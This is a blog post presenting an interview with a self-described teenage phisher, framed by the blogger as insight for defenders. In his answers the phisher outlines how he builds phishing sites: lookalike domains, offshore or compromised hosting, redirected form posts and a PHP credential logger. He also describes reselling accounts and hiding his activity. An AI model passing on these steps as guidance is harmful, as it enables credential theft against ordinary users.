Okay, I had a lot of fun with this post. No new news here, but I was able to talk to someone who was willing to sit down and write out some thoughts from a phisher’s perspective. The phisher goes by the name “lithium” and agreed to answer a number of questions that have been on my mind for a while now. Huge thanks to him, as I think a lot of this is valuable information to the community at large, These are his words - unmodified:
How would you describe yourself? Age? Did you go to school? Interests?
Determined is the best word to describe myself. I’m 18 years young. Yes, I went to school. I left after high school. My interests are mma (mixed martial arts); fitness and last but not least..The internet!
How did you get your start in phishing? How did you get interested in it?
The typical scam mail that my parents kept recieving in their inbox. They were very poorly done! Yet in general they worked. So, I knew automatically I could come up with more efficient methods and have a far greater outcome.
How long have you been phishing?
I’ve been pishing since I turned 14. So thats, Nearly 5 years.
Do you have any idea how many people’s identities you’ve stolen so far?
Way over 20 million. Social networking worms really hit it off for me! I have so many hundreds of thousands of accounts to many websites I haven’t even got a chance to look through.
Did you need to forge any particular relationships with other people/groups to get started?
No, When I started I went solo. Alot of groups came to me asking if I wanted in, I declined.
What types of sites make the best phishing sites?
Social networking sites, Any site that involves teenagers ranging from 14 years old upwards.
What are the steps you take to set up a phishing site?
I try find a domain name that would best suite the current target. Try find a few similarities which would make my site more realistic. Then, Register it! I then find a reliable anonymouse host. (Offshore are the most reliable) Although, I do tend to use compromised hosting accounts.
Secondly, I view the page source. Then I alter the source code to post the forms information to my pishing site.
Thirdly, I create a php file which will POST the current forms information to a text file on my server. I use the same php file with every site, Just minor alterations are needed since it’s mearly a few lines of php code.
How many people do you typically phish per site you post?
That all depends on the size of the website (the ammount of users) Usually, I pish 30k a day.
How do you monetize the identities and how much does that net you?
Social networking sites, Make me $500 to 1k through CPA deals. 5 times out of 10 the person uses the same password for their email account. Now depending what is inside their email inbox determines how much more profit I make. If an email account has one of the following paypal/egold/rapidshare/ebay accounts even the email account itself, I sell those to scammers. All in all, I make 3k to 4k a day. I only pish 3-4 days a week. Depends on how much time I invest, The more time I invest the greater the outcome.
Are there any costs associated with phishing?
Yes there are costs. A dedicated server, VPN, Network encryption software and time.
What sort of hardware/software do you need to do this? Anything special (phishing kits, etc…)? What kind of internet connection do you use?
For MOST social networking sites, I use a program called MyChanger. You can find it on this website - www.myownchanger.com - This makes pishing so much faster on social networking sites. Everything is automated! messaging/bulletins/comments/profile modifications it’s great. Other than that, I get ALOT of custom programs built to suite my needs from freelance developers. My internet connection isn’t anything fancy, A stanard 1mb adsl line.
How do you keep yourself safe from being caught?
I use VPN’s, Dedicated servers, Proxies and my network traffic is
encrypted. All payments are made through egold.
Are there any anti-phishing deterrents (tools or technology) that make life as a phisher harder?
Oh sure, There are many things that make pishing harder. But since Internet Explorer 7 and firefox 2 have implemented an antiphishing protection, Those two cause the most irritation.
Do you forsee any changes to the phishing industry that are worthy of note?
Anything else you’d like to share/last words?
Lazy web developers are the reason I’m still around pishing.
Pretty telling on the current state of affairs, I’d say. The first interesting point I took from this were that IE7 and FF2 were actually a somewhat okay deterrent. From the looks of it, it hasn’t made much of a dent - only changed the tactics that phishers use. I suppose we could have guessed that since there is no lack of phishing emails in our inboxes, still I found it somewhat surprising that it was making a dent. I actually predicted that it would before IE7.0 launched, but I lost a bit of hope afterwards. Interesting nonetheless.
The second is that the password is used in more than one place 50% of the time - we already knew that but it’s interesting to hear it from a phisher’s perspective on how that’s actually useful to help monetize the attack. A huge thanks to lithium who allowed me to post all of his words. Does it make you re-think that MySpace profile you set up?